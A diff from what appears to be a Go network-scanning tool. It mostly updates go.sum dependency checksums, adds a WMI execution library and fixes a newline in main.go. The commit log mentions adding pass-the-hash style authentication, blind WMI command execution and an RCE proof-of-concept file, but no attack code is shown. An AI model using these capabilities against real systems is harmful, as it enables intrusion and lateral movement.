 github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5 h1:ZcsPFW8UgACapqjcrBJx0PuyT4ppArO5VFn0vgnkvmc=
 github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5/go.mod h1:VJNHW2GxCtQP/IQtXykBIPBV8maPJ/dHWirVTwm9GwY=
 github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8=
-github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b h1:Ur6QAxsHCK99Quj9PaWafoV4unb0DO/HWiKExD+TN5g=
-github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU=
+github.com/jlaffaye/ftp v0.0.0-20220630165035-11536801d1ff h1:tN6UCYCBFNrPwvKf4RP9cIhGo6GcZ/IQTN8nqD7eCok=
+github.com/jlaffaye/ftp v0.0.0-20220630165035-11536801d1ff/go.mod h1:hhq4G4crv+nW2qXtNYcuzLeOudG92Ps37HEKeg2e3lE=
 github.com/jonboulle/clockwork v0.1.0/go.mod h1:Ii8DK3G1RaLaWxj9trq07+26W01tbo22gdxWY5EU2bo=
 github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
 github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU=
@@ -144,8 +158,8 @@ github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORN
 github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
 github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=
 github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
-github.com/lib/pq v1.10.4 h1:SO9z7FRPzA03QhHKJrH5BXA6HU1rS4V2nIVrrNC1iYk=
-github.com/lib/pq v1.10.4/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
+github.com/lib/pq v1.10.6 h1:jbk+ZieJ0D7EVGJYpL9QTz7/YW6UHbmdnZWYyK5cdBs=
+github.com/lib/pq v1.10.6/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
 github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40 h1:EnfXoSqDfSNJv0VBNqY/88RNnhSGYkrHaO0mmFGbVsc=
 github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40/go.mod h1:vy1vK6wD6j7xX6O6hXe621WabdtNkou2h7uRtTfRMyg=
 github.com/magiconair/properties v1.8.1/go.mod h1:PppfXfuXeibc/6YijjN8zIbojt8czPbwD3XqdrwzmxQ=
@@ -163,13 +177,16 @@ github.com/mitchellh/mapstructure v0.0.0-20160808181253-ca63d7c062ee/go.mod h1:F
 github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y=
 github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
 github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
+github.com/modocache/gover v0.0.0-20171022184752-b58185e213c5/go.mod h1:caMODM3PzxT8aQXRPkAt8xlV/e7d7w8GM5g0fa5F0D8=
 github.com/mwitkow/go-conntrack v0.0.0-20161129095857-cc309e4a2223/go.mod h1:qRWi+5nqEBWmkhHvq77mSJWrCKwh8bxhgT7d/eI7P4U=
 github.com/neelance/astrewrite v0.0.0-20160511093645-99348263ae86/go.mod h1:kHJEU3ofeGjhHklVoIGuVj85JJwZ6kWPaJwCIxgnFmo=
 github.com/neelance/sourcemap v0.0.0-20200213170602-2833bce08e4c/go.mod h1:Qr6/a/Q4r9LP1IltGz7tA7iOK1WonHEYhu1HRBA7ZiM=
 github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U=
 github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc=
 github.com/pelletier/go-toml v1.2.0/go.mod h1:5z9KED0ma1S8pY6P1sdut58dfprrGBbd/94hg7ilaic=
+github.com/pkg/browser v0.0.0-20180916011732-0a3d74bf9ce4/go.mod h1:4OwLy04Bl9Ef3GJJCoec+30X3LQs/0/m4HFRt/2LUSA=
 github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
+github.com/pkg/errors v0.8.1 h1:iURUrRGxPUNPdy5/HRSm+Yj6okJ6UtLINN0Q9M4+h3I=
 github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
 github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
@@ -188,17 +205,19 @@ github.com/rogpeppe/fastuuid v0.0.0-20150106093220-6724a57986af/go.mod h1:XWv6So
 github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4=
 github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
 github.com/ryanuber/columnize v0.0.0-20160712163229-9b3edd62028f/go.mod h1:sm1tb6uqfes/u+d4ooFouqFdy9/2g9QGwK3SQygK0Ts=
-github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca h1:NugYot0LIVPxTvN8n+Kvkn6TrbMyxQiuvKdEwFdR9vI=
-github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU=
+github.com/satori/go.uuid v1.2.0 h1:0uYX9dsZ2yD7q2RtLRtPSdGDWzjeM3TbMJP9utgA0ww=
+github.com/satori/go.uuid v1.2.0/go.mod h1:dA0hQrYB0VpLJoorglMZABFdXlWrHn1NEOzdhQKdks0=
 github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc=
+github.com/shadow1ng/goWMIExec v0.0.2 h1:tZdno/F0JVwwpX34fidRqnT7lvobUgelyb/wWd7YgcM=
+github.com/shadow1ng/goWMIExec v0.0.2/go.mod h1:SWfWb5+XTfacyp4OULdNsxOdsQTjFEpAUEn5JGTCMIA=
 github.com/shadow1ng/grdp v1.0.3 h1:d29xgHDK4aa3ljm/e/yThdJxygf26zJyRPBunrWT65k=
 github.com/shadow1ng/grdp v1.0.3/go.mod h1:3ZMSLWUvPOwoRr6IwpAQCzKbLEZqT80sbyxxe6YgcTg=
 github.com/shurcooL/go v0.0.0-20200502201357-93f07166e636/go.mod h1:TDJrrUr11Vxrven61rcy3hJMUqaf/CLWYhHNPmT14Lk=
 github.com/shurcooL/httpfs v0.0.0-20190707220628-8d4bc4ba7749/go.mod h1:ZY1cvUeJuFPAdZ/B6v7RHavJWZn2YPVFQ1OSXhCGOkg=
 github.com/shurcooL/sanitized_anchor_name v1.0.0/go.mod h1:1NzhyTcUVG4SuEtjjoZeVRXNmyL/1OwPU0+IJeTBvfc=
 github.com/shurcooL/vfsgen v0.0.0-20200824052919-0d455de96546/go.mod h1:TrYk7fJVaAttu97ZZKrO9UbRa8izdowaMIZcxYMbVaw=
-github.com/sijms/go-ora/v2 v2.2.16 h1:tFJPbECgd7whezLCewJVA7dLiEi9DpK6kEPoFcUkRJg=
-github.com/sijms/go-ora/v2 v2.2.16/go.mod h1:jzfAFD+4CXHE+LjGWFl6cPrtiIpQVxakI2gvrMF2w6Y=
+github.com/sijms/go-ora/v2 v2.4.28 h1:u+1MgJqqMTD93Zc/9aoLC03hD1E9KAxtegWhwj98y/Q=
+github.com/sijms/go-ora/v2 v2.4.28/go.mod h1:EHxlY6x7y9HAsdfumurRfTd+v8NrEOTR3Xl4FWlH6xk=
 github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo=
 github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc=
 github.com/smartystreets/goconvey v1.6.4/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA=
@@ -215,11 +234,15 @@ github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIY
 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww=
 github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
 github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw=
 github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
 github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
+github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
 github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA=
-github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
-github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=
+github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU=
 github.com/subosito/gotenv v1.2.0/go.mod h1:N0PQaV/YGNqwC0u51sEeR/aUtSLEXKX9iv69rRypqCw=
 github.com/tfriedel6/canvas v0.12.1/go.mod h1:WIe1YgsQiKA1awmU6tSs8e5DkceDHC5MHgV5vQQZr/0=
 github.com/tmc/grpc-websocket-proxy v0.0.0-20190109142713-0ad062ec5ee5/go.mod h1:ncp9v5uamzpCO7NfCPTXjqaC+bZgJeR0sMTm6dMHP7U=
@@ -230,16 +253,26 @@ go.etcd.io/bbolt v1.3.2/go.mod h1:IbVyRI1SCnLcuJnV2u8VeU0CEYM7e686BmAb1XKL+uU=
 go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU=
 go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8=
 go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE=
+go.uber.org/atomic v1.5.0 h1:OI5t8sDa1Or+q8AeE+yKeB/SDYioSHAgcVljj9JIETY=
+go.uber.org/atomic v1.5.0/go.mod h1:sABNBOSYdrvTF6hTgEIbc7YasKWGhgEQZyfxyTvoXHQ=
 go.uber.org/multierr v1.1.0/go.mod h1:wR5kodmAFQ0UK8QlbwjlSNy0Z68gJhDJUG5sjR94q/0=
+go.uber.org/multierr v1.3.0 h1:sFPn2GLc3poCkfrpIXGhBD2X0CMIo4Q/zSULXrj/+uc=
+go.uber.org/multierr v1.3.0/go.mod h1:VgVr7evmIr6uPjLBxg28wmKNXyqE9akIJ5XnfpiKl+4=
+go.uber.org/tools v0.0.0-20190618225709-2cfd321de3ee h1:0mgffUl7nfd+FpvXMVz4IDEaUSmT1ysygQC7qYo7sG4=
+go.uber.org/tools v0.0.0-20190618225709-2cfd321de3ee/go.mod h1:vJERXedbb3MVM5f9Ejo0C68/HhF8uaILCdgjnY+goOA=
 go.uber.org/zap v1.10.0/go.mod h1:vwi/ZaCAaUcBkycHslxD9B2zi4UTXhF60s6SWpuDF0Q=
+go.uber.org/zap v1.14.0 h1:/pduUoebOeeJzTDFuoMgC6nRkiasr1sBCIEorly7m4o=
+go.uber.org/zap v1.14.0/go.mod h1:zwrFLgMcdUuIBviXEYEH1YKNaOBnKXsx2IPda5bBwHM=
 golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
 golang.org/x/crypto v0.0.0-20181029021203-45a5f77698d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
 golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
-golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
 golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/crypto v0.0.0-20200221231518-2aa609cf4a9d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
 golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
 golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a/go.mod h1:P+XmwS30IXTQdn5tA2iutPOUgjI07+tq3H3K9MVA1s8=
@@ -259,12 +292,14 @@ golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTk
 golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
 golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
 golang.org/x/lint v0.0.0-20190909230951-414d861bb4ac/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
+golang.org/x/lint v0.0.0-20190930215403-16217165b5de h1:5hukYrvBGR8/eNkX5mdUezrA6JiaEZDtJb9Ei+1LlBs=
 golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
 golang.org/x/mobile v0.0.0-20181026062114-a27dd33d354d/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
 golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
 golang.org/x/mobile v0.0.0-20190719004257-d2bd2a29d028/go.mod h1:E/iHnbuqvinMTCcRqshq8CkpyQDoeVncDDYHnLhea+o=
 golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc=
 golang.org/x/mod v0.1.0/go.mod h1:0QHyrYULN0/3qlju5TqG8bIK38QM8yzMo5ekMj3DlcY=
+golang.org/x/mod v0.3.0 h1:RM4zey1++hCTbCVQfnWeKs9/IEsaBLA8vTkd0WVtmH4=
 golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
 golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
 golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
@@ -282,8 +317,9 @@ golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR
 golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
-golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 h1:qWPm9rbaAMKs8Bq/9LRpbMqxWRVUAQwMI9fVrssnTfw=
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+golang.org/x/net v0.0.0-20210610132358-84b48f89b13b h1:k+E048sYJHyVnsr1GDrRZWQ32D2C7lWs9JRc0bel53A=
+golang.org/x/net v0.0.0-20210610132358-84b48f89b13b/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
 golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
 golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
@@ -312,15 +348,17 @@ golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 h1:F5Gozwx4I1xtr/sr/8CFbb57iKi3297KFs0QDbGN60A=
 golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
-golang.org/x/text v0.3.3 h1:cokOdA+Jmi5PJGXLlLllQSgYigAEfHXJAERHVMaCc2k=
 golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M=
+golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
 golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
 golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
 golang.org/x/tools v0.0.0-20180221164845-07fd8470d635/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
@@ -340,12 +378,16 @@ golang.org/x/tools v0.0.0-20190628153133-6cdbf07be9d0/go.mod h1:/rFqwRUd4F7ZHNgw
 golang.org/x/tools v0.0.0-20190816200558-6889da9d5479/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.0.0-20190911174233-4f2ddba30aff/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.0.0-20191012152004-8de300cfc20a/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.0.0-20191029041327-9cc4af7d6b2c/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.0.0-20191029190741-b9c20aec41a5/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.0.0-20191112195655-aa38f8e97acc/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
 golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.1.0 h1:po9/4sTYwZU9lPhi1tOrb4hCv3qrhiQ77LZfGa2OjwY=
 golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0=
 golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE=
 golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE=
 google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M=
@@ -386,14 +428,18 @@ gopkg.in/yaml.v2 v2.0.0-20170812160011-eb3733d160e7/go.mod h1:JAlM8MvJe8wmxCU4Bl
 gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
 gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
 gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
 gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
-gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo=
 gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
+gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
 honnef.co/go/js/dom v0.0.0-20200509013220-d4405f7ab4d8/go.mod h1:sUMDUKNB2ZcVjt92UnLy3cdGs+wDAcrPdV3JP6sVgA4=
 honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
 honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
 honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
 honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
+honnef.co/go/tools v0.0.1-2019.2.3 h1:3JgtbtFHMiCmsznwGVTUWbgGov+pVqnlf1dEJTNAXeM=
 honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg=
 rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8=
--- a/image/sponsor.png
+++ b/image/sponsor.png
--- a/main.go
+++ b/main.go
@@ -14,5 +14,5 @@ func main() {
 	common.Parse(&Info)
 	Plugins.Scan(Info)
 	t := time.Now().Sub(start)
-	fmt.Printf("[*] 扫描结束,耗时: %s", t)
+	fmt.Printf("[*] 扫描结束,耗时: %s\n", t)
 }
Author	SHA1	Message	Date
影舞者	ae86f08432	Merge remote-tracking branch 'origin/main' # Conflicts: # Plugins/webtitle.go # WebScan/WebScan.go # WebScan/pocs/Hotel-Internet-Manage-RCE.yml	2022-11-19 17:05:25 +08:00
影舞者	3e8f23466d	加入hash碰撞、wmiiexec无回显命令执行	2022-11-19 17:04:13 +08:00
影舞者	9d4d67e523	Merge pull request #240 from ruishawn/main fix: 优化扫描输出，扫描结果结尾换行	2022-11-02 17:41:06 +08:00
xiaobo	fc416545a3	fix: 优化扫描输出，扫描结果结尾换行	2022-11-02 17:29:12 +08:00
